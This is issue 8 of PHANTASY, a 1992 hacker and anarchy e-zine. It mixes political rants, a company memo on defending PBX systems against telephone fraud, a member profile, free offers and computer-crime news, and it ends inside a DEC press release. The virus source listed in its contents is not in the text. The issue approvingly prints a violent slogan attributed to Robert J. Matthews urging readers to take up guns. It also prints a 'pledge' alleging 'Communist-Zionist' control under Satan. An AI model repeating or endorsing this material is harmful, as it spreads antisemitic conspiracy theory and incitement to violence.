1237 lines
51 KiB
Groff
1237 lines
51 KiB
Groff
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
= =
|
|
- WELCOME TO THE EIGHTH ISSUE OF -
|
|
= =
|
|
- -=>PHANTASY<=- -
|
|
= =
|
|
- A PUBLICATION AND NEWSLETTER OF -
|
|
= =
|
|
- THE -
|
|
= INTERNATIONAL =
|
|
- INFORMATION -
|
|
= RETRIEVAL =
|
|
- GUILD -
|
|
= =
|
|
- Hacking,Phreaking,Anarchy,Survivalism,Commentary -
|
|
= =
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
|
|
Volume Number Three,Issue Number Eight Dated 6/05/92
|
|
Editor: Mercenary@f515.n141.z1.fidonet.org
|
|
|
|
Article Submissions: The Mercenary/IIRG
|
|
862 Farmington Avenue
|
|
Suite 306
|
|
Bristol,Ct 06010
|
|
|
|
IIRG World Headquarters BBS: Dark Shadows
|
|
19.2/9600 Baud HST
|
|
24 Hours a Day
|
|
1.2 Gigs Online
|
|
(203)-628-9660
|
|
|
|
Table of Discontents:
|
|
|
|
|
|
[1] Quick Comment
|
|
By: Mercenary
|
|
|
|
[2] Communists Alive and Well in the U.S.
|
|
By: Red Dawn
|
|
|
|
[3] TeleFraud: (A Case Example)
|
|
By: Anonymous
|
|
|
|
[4] IIRG Members Profiles: Rowdy Roddy Piper
|
|
|
|
[5] New World Order Pledge of Dis-Allegiance
|
|
Provided By: Saint Anarchy
|
|
|
|
[6] IIRG FREEBIES: New Section Devoted to promotions
|
|
available to our readers!
|
|
|
|
[7] PHANTASY TIDBITS: News and Views of Interest
|
|
|
|
|
|
[8] FOR THE PEOPLE
|
|
Supplied By: Bulletin Boards Across the Country
|
|
Edited by: Mercenary
|
|
|
|
1. Michelangelo Source Code
|
|
2. Phil Katz Warning
|
|
3. Virus Poem
|
|
|
|
|
|
[9] Listing of PHANTASY Distribution Sites
|
|
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
|
|
OFFICIAL DISLAIMER...
|
|
|
|
All information in PHANTASY is from USER contributed material
|
|
The Publishers and Editors of PHANTASY and THE IIRG disclaim
|
|
any liability from any damages of any type that the reader or
|
|
user of such information contained within this newsletter may encounter
|
|
from the use of said information. All files are brought to you for
|
|
entertainment purposes only! We also assume all information infringes
|
|
no copyrights and hereby disclaim any liability.
|
|
|
|
PHANTASY is (C) 1990 by The IIRG
|
|
IIRG and INTERNATIONAL INFORMATION RETRIEVAL GUILD is (C) 1982
|
|
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
|
|
Section [1]: Quick Comment
|
|
By: Mercenary
|
|
|
|
ATTENTION!! All File creators,Publishers,BBS-aholics
|
|
the Former IIRG WHQ Runestone BBS is gone.
|
|
Please do not list it in your files.
|
|
The New WHQ is:
|
|
|
|
|
|
IIRG World Headquarters BBS: Dark Shadows
|
|
19.2/9600 Baud HST
|
|
24 Hours a Day
|
|
1.2 Gigs Online
|
|
(203)-628-9660
|
|
|
|
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
|
|
Section [2]: Communists Alive and Well in the U.S.
|
|
By: Red Dawn
|
|
|
|
The Berlin Wall came down, and its about time. But the RED Menace is alive
|
|
and Well folks. The So called Russian Republics (Soviet DisUnion) haven't
|
|
gone anywhere. So why are the piss ant politicians in the U.S. rolling over
|
|
and playing Dead? Money, Yes its that simple Money.
|
|
One world Government means power and power means money and as long as our
|
|
leaders are more concerned about filling thier pockets and not filling
|
|
peoples stomachs, were on our own.
|
|
The Chinese Communists just exploded the largest underground nuclear blast
|
|
ever, the Soviets still have there nukes and the PLP is alive and well here
|
|
in the U.S.
|
|
On a recent jaunt up to MIT, I was approached by a PLP (Progressive Labor
|
|
Party) member. The PLP is the American Communist Party for those who are new
|
|
to this. He asked if I'd like to buy a copy of "Challenge" (The Revolutionary
|
|
Communist Newspaper) I said No, but I'll take this copy for free comrade.
|
|
and walked off with the poor little Reds paper.
|
|
NOTE: Please dont feel bad for the Red, Communism states whats yours is mine
|
|
so I was just teaching him about true Communism control
|
|
Now the PLP is getting smart, they are recruiting Puerto Ricans and other
|
|
third world spanish speakers, as the lead story is "STOP RACIST REPATRIATION
|
|
OF HAITANS" and the paper is now half spanish.
|
|
What better way to boost your cause then appeal to an already unrestful
|
|
group of people.
|
|
Well I say enough, lets show the Communists that we can take America Back
|
|
by unseating mailing them your thoughts.
|
|
|
|
I'd Advise this on a Post Card:
|
|
|
|
We Love America,and not Karl Marx.... Signed a Concerned American
|
|
|
|
Mail to: The Progressive Labor Party
|
|
231 West 29th Street
|
|
Room 502
|
|
New York,NY 10001
|
|
|
|
Or Call: (212)-629-0002
|
|
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
|
|
GIVE YOUR SOUL TO GOD AND PICK UP YOUR GUN, ITS TIME TO DEAL IN LEAD.
|
|
WE ARE THE LEGIONS OF THE DAMNED,THE ARMY OF THE ALREADY DEAD.
|
|
|
|
Robert J. Matthews
|
|
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
|
|
Section [3]: TeleFraud: (A Case Example)
|
|
By: Anonymous
|
|
|
|
Hacking and Phreaking has long been a game of cat and mouse, between
|
|
Hacker and System Administrator. In a role reversal I'd like to present
|
|
the response of an Undisclosed Insurance Company to hackers penetrating
|
|
thier system by presenting the memo distributed to system operators.
|
|
|
|
-------------------------------------------------------------------------------
|
|
From the Director of Systems Security to all employees:
|
|
|
|
We have experienced telephone fraud (TeleFraud) in which outsiders,
|
|
(I.E. Hackers) penetrated a regional office telephone system and made long
|
|
distance calls that were charged to the company (In one case the cost of
|
|
those calls was about $27,000) A number of steps are being implemented to
|
|
elimanate this exposure) We want to inform you about some of them, and ask
|
|
for your help and cooperation.
|
|
|
|
NOTE: This article may contain terminology new to you. A "Definition of Terms"
|
|
is included on the last page to help clarify these terms.
|
|
|
|
|
|
BACKGROUND:
|
|
|
|
The most common form of telefraud involves the use of 800 numbers,credit
|
|
cards, and third party calling. Hackers get these numbers from a number of
|
|
sources, such as:
|
|
|
|
A. Advertisements
|
|
|
|
B. Eavesdropping (e.g. when you charge your telephone call to another number
|
|
while using a public telephone)
|
|
|
|
C. Using old company telephone books and manuals that contain numbers of
|
|
Key System or Private Branch Exchange (PBX) systems, which are the heart
|
|
of our internal telephone system.
|
|
|
|
Technically sophisticated hackers dial these numbers, and through computer
|
|
program routines, determine authorization codes.
|
|
Having learned these codes, they post them on computer bulletin boards or
|
|
sell them. Literally within minutes unauthorized calls are passing through
|
|
the system.
|
|
To reduce or eliminate this exposure, our department as well as others are
|
|
working together to protect our telephone systems. Some of these protection
|
|
measures include:
|
|
|
|
1. Development and implementation of controls in conjuction with our telephone
|
|
vendors (e.g. AT&T and MCI) to restrict access to certain telephone
|
|
features. Some of these controls include prohibiting the use of Remote
|
|
Access,trunk to trunk,and DISA services.
|
|
|
|
2. Making you, as telephone users, aware of this problem and identifying ways
|
|
you can help. This memo is part of this program.
|
|
|
|
HOW CAN YOU HELP?:
|
|
|
|
Here are some suggestions:
|
|
|
|
Telephone Credit Cards:
|
|
|
|
1. Don't give your credit card number to anyone
|
|
2. When calling from a payphone, use card readers whenever possible.
|
|
3. Don't read the number loud enough for others to hear, or let others
|
|
observe you entering your number.
|
|
4. Report lost or stolen cards immediately.
|
|
5. Use your body to block the view of someone who may be watching to see the
|
|
access code you are punching into the telephone.
|
|
|
|
800 Service:
|
|
|
|
1. Don't install an 800 number unless it's absolutely necessary.
|
|
2. Remove the line when it's no longer needed.
|
|
3. Limit 800 service to applications that are answered by people.
|
|
4. Avoid 800 service to Phonemail or Voice Response Units (VRU).
|
|
|
|
International/Domestic Toll Calls:
|
|
|
|
1. Block country and/or area codes that you don't call.
|
|
2. Limit the use of International Class of Service at the handset level.
|
|
3. Block 900 calls with the local telephone company.
|
|
|
|
Dial Data Lines:
|
|
|
|
1. Block third party calling with the local telephone company.
|
|
2. Establish VNET range restrictions
|
|
|
|
Remote Access:
|
|
|
|
1. Disable this feature on the PBX. We have surveyed our PBX vendors
|
|
country-wide to ensure these facilities are not enabled.
|
|
|
|
Trunk-to-Trunk:
|
|
|
|
1. Disable this feature on the PBX. We have surveyed our PBX vendors
|
|
country-wide to ensure these facilities are not enabled.
|
|
|
|
Phonemail:
|
|
|
|
1. Change passwords frequently
|
|
2. Deactivate unused mailboxes
|
|
3. Limit the number of "Guest" mailboxes
|
|
4. Don't publish the system access number to anyone who doesn't use
|
|
phonemail.
|
|
5. Lock out the subscriber after three unsuccessful attempts to enter the
|
|
mailbox.
|
|
6. Keep system administrator ID's secret and change them frequently.
|
|
|
|
Third Party Calling:
|
|
|
|
1. Request the local telephone company to block third party calling on
|
|
dial data,fax,and private lines.
|
|
2. Limit the installation of private lines
|
|
|
|
PBX (Private Branch Exchange):
|
|
|
|
1. Do not reveal maintenance port passwords to callers without positive ID
|
|
2. Delete unused extensions
|
|
|
|
VRU (Voice Response Units):
|
|
|
|
1. Do not enable trunk-to-trunk transfer.
|
|
2. Program only a select number of extensions to which callers can be
|
|
transferred (i.e. establish a table of extensions).
|
|
3. Do not program station transfer
|
|
4. Passwords, (e.g. logon ID's customer PIN's) should be carefully protected
|
|
and changed frequently.
|
|
|
|
Automated Attendant:
|
|
|
|
1. Do not enable trunk-to trunk transfer.
|
|
2. Do not program station transfer
|
|
3. Delete unused extensions
|
|
4. Deactivate software features if not in use.
|
|
|
|
Hardcopy Listings:
|
|
|
|
1. Properly dispose of old telephone books,manuals,or telephone bills that
|
|
contain sensitive telephone numbers.
|
|
2. Review all telephone charges,looking for patterns and excessive charges.
|
|
|
|
Dial Access to Computers:
|
|
|
|
1. Secure dial lines to all computer systems.
|
|
|
|
Miscellaneous:
|
|
|
|
1. Be cautious of unusual situations with your telephone system, such as
|
|
busy signals at odd times.
|
|
|
|
|
|
DEFINITION OF TERMS
|
|
|
|
|
|
PBX
|
|
|
|
Private Branch Exchange. Private automatic system that provides for the
|
|
switching of calls internally, and to and from the public telephone
|
|
network.
|
|
|
|
Trunk-to-Trunk
|
|
|
|
A "trunk" is the telephone line that connects a PBX to the telephone
|
|
company. Therefore a trunk-to-trunk connection ties a PBX system to the
|
|
telephone company.
|
|
|
|
DISA
|
|
|
|
Stands for Direct Inward System Access. This feature gives an outside
|
|
caller the ability to dial directly into a PBX system, without attendant
|
|
(i.e. operator) intervention, and gain access to the PBX system facilities
|
|
and outgoing circuits. DISA software should be disabled, thus eliminating
|
|
this feature/exposure.
|
|
|
|
Voice Mail
|
|
|
|
Hardware and software products that can be integrated or peripheral to a
|
|
PBX system, allowing users to send,receive,and redirect voice messages
|
|
through office telephone systems and computers.
|
|
|
|
Automated Attendant
|
|
|
|
An automated telephone system used to accept incoming calls and direct
|
|
their callers to specific extensions based upon the caller entering touch
|
|
tone numbers. For example, a hacker could call someones Voicemail mailbox
|
|
from the outside and try to break in.
|
|
|
|
VRU (Voice Response Unit)
|
|
|
|
An interactive system that interfaces between the PBX and host computer
|
|
based upon information provided by the caller (e.g. account number,social
|
|
security number)
|
|
|
|
Remote Access
|
|
|
|
Allows a caller at a remote location to access PBX features by telephone.
|
|
Individual authorization codes are usually required. Remote access allows
|
|
the caller to potentially access an outside (e.g. long distance) line,
|
|
and is usually accomplished through the use of DISA or automated
|
|
attendant features.
|
|
|
|
VNET (Virtual Network)
|
|
|
|
A registered MCI service that offers a range of telephone limits and/or
|
|
restrictions (e.g. allows calls only within U.S., does not allow calls to
|
|
Virgin Islands,etc.)
|
|
|
|
Key System:
|
|
|
|
A small, multi-line internal telephone system similar to a PBX.
|
|
Norstar,Spirit,and Merlin are examples of a key system.
|
|
|
|
|
|
|
|
Remember: All of us are potential victims of telephone fraud. Hackers are
|
|
determined to use our telephone system and not pay for that
|
|
service. Please be as determined to ensure they do not.
|
|
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
|
|
ONE CRIME IS CONCEALED BY THE COMMISSION OF ANOTHER
|
|
|
|
Seneca
|
|
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
|
|
Section [4]: IIRG Members Profiles: Rowdy Roddy Piper
|
|
|
|
------------------------------------------------------------------------------
|
|
Rowdy Roddy Piper
|
|
------------------------------------------------------------------------------
|
|
|
|
Handle: Rowdy Roddy Piper
|
|
Call him: Piper
|
|
Past handles: None
|
|
Handle origin: Wrestler Rowdy Roddy Piper of WWF fame
|
|
Past Computers: Commodore 64 With ICT Data Chief
|
|
Commodore 128
|
|
Amiga 1000
|
|
286/12
|
|
|
|
Present Computer: 386/33
|
|
1300 Megs Storage
|
|
Courier HST
|
|
Courier HST Dual Standard
|
|
|
|
|
|
Sysop: Pipers Pit BBS
|
|
|
|
Background:
|
|
|
|
Piper Started his original Commodore oriented BBS in March 1985. The Board
|
|
was originally run off of a C-64 with 2 SFD 1001's. Continually upgrading his
|
|
system Piper switched from his original C-Net configuration to Color 64
|
|
with a C-128 with 1750 Ram expander and 2 ICT Data Chief HFD20's.
|
|
It was at this time that Piper met Mercenary at the now defunct CompuTech
|
|
systems and started attending the original IIRG meetings at the Bar and
|
|
pizza joint next door.
|
|
With the Commodore community rapidly dwindling and the IIRG no longer
|
|
supporting the C64/128, Piper sold his Commodore BBS for a $400.00 profit
|
|
over what he invested in it and Bought a 286/12 and an Amiga 1000 with
|
|
1.5 megs.
|
|
Now, with the his vast majority of users being IBM, Piper has switched
|
|
to a 386/33 Tower with 1300 Megs of storage,2 Nodes (HST and HST D/S.
|
|
But being true to his roots, Piper still supports the Amiga line.
|
|
|
|
|
|
Pipers Favorite Things
|
|
----------------------
|
|
|
|
Running his BBS
|
|
Music (Extensive CD Collection)
|
|
The one month his phone bill ran under $100.00
|
|
|
|
Most Memorable Experiences
|
|
--------------------------
|
|
|
|
Selling his original commodore BBS for $400.00 more than he originally
|
|
purchased the Equipment for, and passing out at the 1989 IIRG Hack
|
|
Bash before the keg was tapped.
|
|
|
|
|
|
People to Mention
|
|
-----------------
|
|
Thanks to: Pie Man,
|
|
Mercenary, a downright strange individual
|
|
Anubis, an even stranger individual
|
|
The now defunct CompuTech systems and its owner Redbone
|
|
|
|
Fucks to: Internal Revenue, America's Legal Organized Crime Syndicate
|
|
Credit Bureaus, Go ahead---Make my Limit
|
|
and 95% of all elected officials
|
|
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
|
|
A NICKNAME IS THE HEAVIEST STONE THE DEVIL CAN THROW AT A MAN
|
|
|
|
Anon
|
|
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
|
|
Section [5]: New World Order Pledge of Dis-Allegiance
|
|
Provided By: Saint Anarchy
|
|
|
|
As our brave and trustworthy leaders usher in there new world order,
|
|
I suggest each one of you memorize this Pledge to it.
|
|
|
|
We pledge dis-allegiance to the United Nations flag and the confusion,
|
|
the treason,the wars,and the bloodshed for which it stands.
|
|
One World (under Satan), uniting all nations under one Communist-Zionist
|
|
international economic control.
|
|
Promoting (under the guise of benevolence and welfare) Metro Government,
|
|
Regionalization,Urban Renewal,Model Cities,causing distress to young and
|
|
old,totally changing our form of government, and working toward a One
|
|
World Bank (Acclomplished, a One World Government,and a One World Church,
|
|
without God and his Holy Word, the Bible. In his name we reject and defy
|
|
the United Nations Flag and the totalitarianism for which it stands.
|
|
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
|
|
FREEDOM HATH A THOUSAND CHARMS TO SHOW
|
|
THAT SLAVES HOWE'ER CONTENDED NEVER KNOW
|
|
|
|
Cowper
|
|
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
|
|
Section [6]: IIRG FREEBIES: A new section to Phantasy
|
|
BY: Mercenary
|
|
|
|
-------------------------------------------------------------------------------
|
|
[1] Security for VMS Systems Handbook
|
|
Available from Digital Equipment Corporation
|
|
Free of Charge
|
|
Call 1-800-332-4636 Extension: SECURE
|
|
-------------------------------------------------------------------------------
|
|
[2] Free $15.00 Introductory Usage to CompuServe
|
|
Free Complimentary subscription to CompuServe Magazine
|
|
Compliments of Digital Equipment Corporation
|
|
Call 1-800-524-3388 Ask for Represenative #332
|
|
-------------------------------------------------------------------------------
|
|
[3] ARAGO Professional dBASE
|
|
Call 1-800-228-3295
|
|
Ask for Free Demo Disk
|
|
-------------------------------------------------------------------------------
|
|
[4] Flow Charting 3
|
|
Call 1-800-525-0082 Extension 1117
|
|
Ask for Free Interactive Demo Disk
|
|
-------------------------------------------------------------------------------
|
|
[5] Vermont Views
|
|
Portable User-Interface for Dos,Unix,Posix,VMS...
|
|
Free Demo Kit
|
|
Call 1-800-848-1248
|
|
Mention Offer #303
|
|
-------------------------------------------------------------------------------
|
|
[6] National Instruments
|
|
Lab Programs
|
|
Free Demo Disks
|
|
1-800-433-3488
|
|
-------------------------------------------------------------------------------
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
|
|
Section [7]: PHANTASY TIDBITS: News and Views of interest from around the
|
|
Computer World
|
|
|
|
-------------------------------------------------------------------------------
|
|
|
|
I GOT EM,I GOT EM, I GOT EM....
|
|
|
|
Arizona Law officers are fuming that the U.S. Justice Department is taking
|
|
credit for the first successful prosecution under the Operation Sundevil
|
|
computer crime investigation. They point out that they nabbed and convicted
|
|
two hackers swept up in the nationwide crackdown on computer crime several
|
|
months ago. One of the hackers is still doing time in a halfway house after
|
|
spending six months in "shock incarceration," a boot camp for first time
|
|
offenders.
|
|
|
|
-------------------------------------------------------------------------------
|
|
|
|
POOR LITTLE BIG BROTHER....
|
|
|
|
Difficulties tapping advanced digital telephone networks for criminal
|
|
investigations have inspired the Federal Bureau of Investigation to propose
|
|
legislation requiring carriers to modify their networks to accommodate court
|
|
approved wiretaps. The multimillion dollar cost of re-engineering the
|
|
networks would be borne by rate payers. Civil liberties groups said a built
|
|
in tapping capability might encourage overly broad government surveillance.
|
|
|
|
-------------------------------------------------------------------------------
|
|
|
|
COULD I GET SOME MINT JELLY WITH THAT PLEASE?
|
|
|
|
A man charged with stealing computer boards from Digital Equipment Corporation
|
|
between February and October 1990 recently received the severed head of a lamb
|
|
wrapped in towels through the U.S. Mail. The box arrived at the Lexington,
|
|
Mass., home of Edward Desmond Jr. on Feb 28th. Desmond had cooperated with the
|
|
government during part of the 2 1/2 year investigation, which led to the
|
|
indictment of 16 people. A plea agreement with Desmond was reportedly
|
|
rescinded after he was caught commiting other crimes.
|
|
|
|
-------------------------------------------------------------------------------
|
|
|
|
INTERNET ADVISORY BOARD SETS S.N.M.P. SECURITY RULES
|
|
|
|
The Simple Network Management Protocol (SNMP) security specifications now
|
|
before the Internet Advisory Board would provide the following features:
|
|
|
|
1. A data-encryption standard based specification that encrypts messages
|
|
between the SNMP manager and agent. This is useful for sending down new or
|
|
updated keys that determine what management functions a SNMP station can
|
|
access or that define authorization levels within a station.
|
|
|
|
2. Origin Authentication that prevents unauthorized users who have obtained
|
|
an SNMP workstations access code from masquerading as an authentic user.
|
|
|
|
3. Replay protection that keeps a user from delaying an SNMP transmission,
|
|
such as a command to take a workstation offline, and sending it at a later
|
|
date.
|
|
|
|
4. Message integrity that keeps authorized users from changing the contents
|
|
of a SNMP message.
|
|
|
|
-------------------------------------------------------------------------------
|
|
|
|
BOOK PUSHER SEEKS TO INFLATE EGO
|
|
|
|
Computer Security Expert Winn Schwartau, whose book, Terminal Compromise,
|
|
describes how a terrorist gang could paralyze the U.S. with a computer virus,
|
|
sees a parrallel between his text and real life.
|
|
"When the Michelangelo virus scare began, it was eerie, like somone had lifted
|
|
the events right out of my book," he says. "Viruses are evolving into a
|
|
terrorist's weapon and are certainly a viable means of waging warfare."
|
|
Terminal compromise is published by Pittsburg-Based Inter-Pact press.
|
|
|
|
IIRG Note: This Jack Ass will say anything to sell his book, so save the
|
|
$19.95 and go out and get drunk instead. The book is pure
|
|
garbage.
|
|
|
|
-------------------------------------------------------------------------------
|
|
|
|
JACKASS's and MORE JACKASS's
|
|
|
|
The Associated press reports that the theft of a portable PC in Australia was
|
|
solved when the thief sent a fax to the unit's maker, DFM Systems of Des
|
|
Moines,Iowa asking for a power cord,documentation, and software.
|
|
What the crook didn't know was the DFM TraveLite PC was the only such system
|
|
in Australia. The unit was owned by Sydney based ACEL, which the thief had
|
|
burglarized. DFM contacted ACEL's managing director, who then contacted the
|
|
police. A ploice officer later contacted the crook, who had supplied his
|
|
street address on the fax.
|
|
|
|
-------------------------------------------------------------------------------
|
|
|
|
I HEAR YA' KNOCKIN, BUT YA' CAN'T COME IN
|
|
|
|
Whozz Calling uses your local phone company's Caller ID service to intercept
|
|
the ID information before you answer your phone. The product sends the
|
|
identification of the caller via standard RS-232 serial wire to your computer
|
|
which looks up the caller name,displays it,stores it,elects not to answer the
|
|
call, or diverts the call to an answering machine.
|
|
A DOS compatible,menu driven TSR program can optionally pop up information
|
|
about the caller,bringing up the callers ID before you answer the phone.
|
|
|
|
Price: $79.00 (Requires Caller ID)
|
|
Contact: Zeus Phonstuff
|
|
1000 Holcomb Woods Parkway
|
|
Suite 410-C
|
|
Roswell,GA 30076
|
|
(404)-587-1541
|
|
(404)-587-1609 (FAX)
|
|
|
|
-------------------------------------------------------------------------------
|
|
|
|
TWO AT CORNELL INDICTED IN VIRUS CASE
|
|
|
|
Two Cornell University students now have been indicted for felonies in
|
|
connection with the computer virus case that came to light last
|
|
February at the Ithaca, N.Y., university.
|
|
|
|
David Blumenthal and Mark Pilgrim are accused of embedding a virus in
|
|
three Apple Macintosh computer games that were sent from Cornell's
|
|
computer center to an archive at Stanford University. Authorities say
|
|
from there, the games were duplicated and wound up in computers across
|
|
the U.S., Japan and Great Britain.
|
|
|
|
Blumenthal, 20, and Pilgrim, 19, who, in convicted, face a maximum
|
|
four years in prison, were arrested in February on misdemeanor
|
|
charges, which were increased to felonies because the virus is
|
|
believed to have caused more than $1,000 in damage, said county
|
|
District Attorney George Dentes.
|
|
|
|
-------------------------------------------------------------------------------
|
|
AT&T INTRODUCES PRODUCTS TO FIGHT PHONE FRAUD NEW YORK (Reuter)
|
|
|
|
-- American Telephone & Telegraph Co. rolled out a new security program
|
|
yesterday aimed at protecting businesses from anyone who might try to "steal"
|
|
their long-distance telephone service. Branding phone fraud as a nationwide
|
|
problem costing upwards of $1.2 billion a year, the company said its AT&T
|
|
NetProtect program gives customers the products, services and education they
|
|
need to combat such fraud, as well as protection against financial liability.
|
|
|
|
Long-Distance fraud often takes place when an outsider, say a computer
|
|
hacker, cracks the access codes to a company's private branch exchange, or PBX
|
|
-- an internal phone system that allows easy access to branch offices and major
|
|
customers. The PBX can then be used to place long-distance or international
|
|
calls as if by someone inside the company. The practice, a misdemeanor crime
|
|
with no jail sentence in many states, typically is done for monetary gain. The
|
|
"stolen" service can be sold on the street, sometimes providing drug
|
|
traffickers with international calls that cannot be traced. "Long-distance
|
|
fraud is a serious criminal problem, and we believe AT&T should stand squarely
|
|
with our customers against the criminals who steal the service," said Joseph
|
|
Nacchio, president of AT&T's Business Communications Services division. AT&T,
|
|
the long-distance carrier created by the 1984 breakup of the former Bell
|
|
telephone system, said its new program would relieve customers from liability
|
|
for the fraud. The company this week began monitoring its toll-free 800 service
|
|
at no extra charge to prevent fraud. From Aug. 1, it also will monitor inter-
|
|
national long-distance service to countries experiencing high levels of fraud.
|
|
|
|
An AT&T spokesman declined to disclose the cost for enhanced and premium
|
|
services that protect customers from financial liability, saying the cost
|
|
structure has not yet been filed with the Federal Communications Commission.
|
|
|
|
Other packages include a $1,995 software package that alerts customers to
|
|
unusual calling patterns and a $150 an hour intervention service under which
|
|
AT&T experts try to stop fraud while it is in progress.
|
|
-------------------------------------------------------------------------------
|
|
|
|
WORLDWIDE MOBILE DATA SOLUTIONS
|
|
|
|
ATLANTA -- May 18, 1992 -- Digital Equipment Corporation, RAM Mobile
|
|
Data, and BellSouth Enterprises, Inc. today announced a worldwide
|
|
agreement to provide mobile data solutions based on the Mobitex
|
|
mobile packet radio network.
|
|
Under the agreement, Digital will offer two-way wireless
|
|
electronic mail to its more than three million existing ALL-IN-1
|
|
integrated office system customers. Digital is developing a
|
|
version of its Mobilizer for ALL-IN-1 software that will enable
|
|
users of portable MS-DOS PCs to access ALL-IN-1 electronic mail
|
|
applications without a connection to a telephone outlet.
|
|
Digital plans to provide the same services on the Mobitex
|
|
mobile network in the United Kingdom. In addition, wireless
|
|
electronic mail services will be offered to customers in several
|
|
other countries where RAM and BellSouth plan to operate Mobitex
|
|
networks. Digital's wireless electronic mail offering will be
|
|
available in the first quarter of calendar year 1993.
|
|
Digital also announced the DECmobile program, under which
|
|
the company will deliver fully integrated, end-to-end mobile data
|
|
communications solutions that extend enterprise computing
|
|
networks to mobile users. The announcements were made at the ICA
|
|
telecommunications industry conference held here May 18-21.
|
|
"With these announcements, Digital is moving aggressively
|
|
into the fast-growing mobile data market," said Ernst E.
|
|
Wellhoener, vice president of Digital's Telecommunications
|
|
Business Group. "We are supporting our commitment with
|
|
substantial investments of time, money, and resources to build
|
|
the kinds of mobile data solutions our customers require."
|
|
Digital Becomes RAM Mobile Data Systems Integrator
|
|
Under the DECmobile program, Digital will offer customers
|
|
complete mobile data solutions, acting as systems integrator for
|
|
RAM Mobile Data and other service providers. Digital will
|
|
provide a single point of contact for customers seeking to
|
|
benefit from new mobile data communications services.
|
|
Digital is entering into business relationships with leading
|
|
suppliers of radio modems, handheld PCs, and cellular devices.
|
|
The company currently has relationships with Ericsson Mobile
|
|
Communications AB, Fujitsu Personal Systems (formerly Poqet
|
|
Computer Corporation), and Husky Computers, Inc.
|
|
"The move into mobile data represents a natural progression
|
|
for Digital, a leader in providing networked computer systems and
|
|
one of the computer industry's foremost systems integrators,"
|
|
Wellhoener said. "Our ability to provide 'one-stop shopping' for
|
|
mobile data solutions helps simplify what might otherwise be a
|
|
difficult process for our customers, enabling them to get
|
|
up-to-speed faster and more cost-effectively."
|
|
Wellhoener said Digital chose Mobitex networks because they
|
|
are feature-rich, sophisticated, and highly efficient. "And
|
|
perhaps most important, the worldwide scope of Mobitex networks
|
|
will enable us to meet the needs of today's multinational
|
|
enterprises," Wellhoener added.
|
|
|
|
Mike Harrell, president of BellSouth Mobile Data, Inc., said
|
|
the alliance would enable mobile data network subscribers to take
|
|
advantage of Digital's worldwide systems integration
|
|
capabilities. "Aligning ourselves with an experienced systems
|
|
integrator ensures our network subscribers have the most
|
|
effective solutions," Harrell said. "We can now expand the market
|
|
for Mobitex into a broad range of networked computer applications."
|
|
Carl Robert Aron, chairman and CEO of RAM, said, "ALL-IN-1
|
|
is the world's leading host-based application that includes
|
|
electronic mail. RAM's Mobitex network is the only mobile data
|
|
network in operation which automatically delivers E-mail messages
|
|
to mobile professionals wherever they are within the network
|
|
service area. The marriage of Mobitex and Mobilizer for ALL-IN-1
|
|
was inevitable."
|
|
Digital Develops Mobile Data Products and Programming Tools
|
|
In addition to developing a wireless interface for its
|
|
Mobilizer for ALL-IN-1 product, Digital is developing an open
|
|
software architecture and a single set of application programming
|
|
interfaces that will be available to software developers. The
|
|
architecture and application programming interfaces, or APIs,
|
|
facilitate the integration of new and existing mobile applications
|
|
for RAM's and other service providers' networks. APIs make it easy
|
|
for developers to write mobile data applications.
|
|
BellSouth Mobile Data is a subsidiary of BellSouth
|
|
Enterprises, Inc., the holding company that manages a group of
|
|
companies for BellSouth Corporation that provide wireless
|
|
telecommunications, advertising and publishing, and
|
|
information-based services throughout the world.
|
|
RAM Mobile Data operates a wireless data communications
|
|
service in major metropolitan areas across the nation. Using
|
|
RAM's service, companies exchange two-way messages and data with
|
|
field personnel equipped with mobile, portable, or handheld
|
|
terminals. RAM Mobile Data Ltd. operates a similar, compatible
|
|
system in the United Kingdom. RAM's radio-based data
|
|
communications network architecture is Mobitex, an international,
|
|
open standard supplied by Ericsson.
|
|
RAM has exclusive use of the Mobitex technology in the
|
|
United States. Mobitex was developed by Ericsson Mobile
|
|
Communications AB and Swedish Telecom. Digital and Ericsson last
|
|
year signed a cooperation agreement under which the two companies
|
|
will develop software tools for the integration of Digital's
|
|
products with the Mobitex network.
|
|
|
|
ALL-IN-1, DECmobile, the Digital logo, and Mobilizer for ALL-IN-1 are
|
|
trademarks of Digital Equipment Corporation.
|
|
Mobitex is a registered trademark of Swedish Telecom
|
|
MS-DOS is a registered trademark of Microsoft Corporation.
|
|
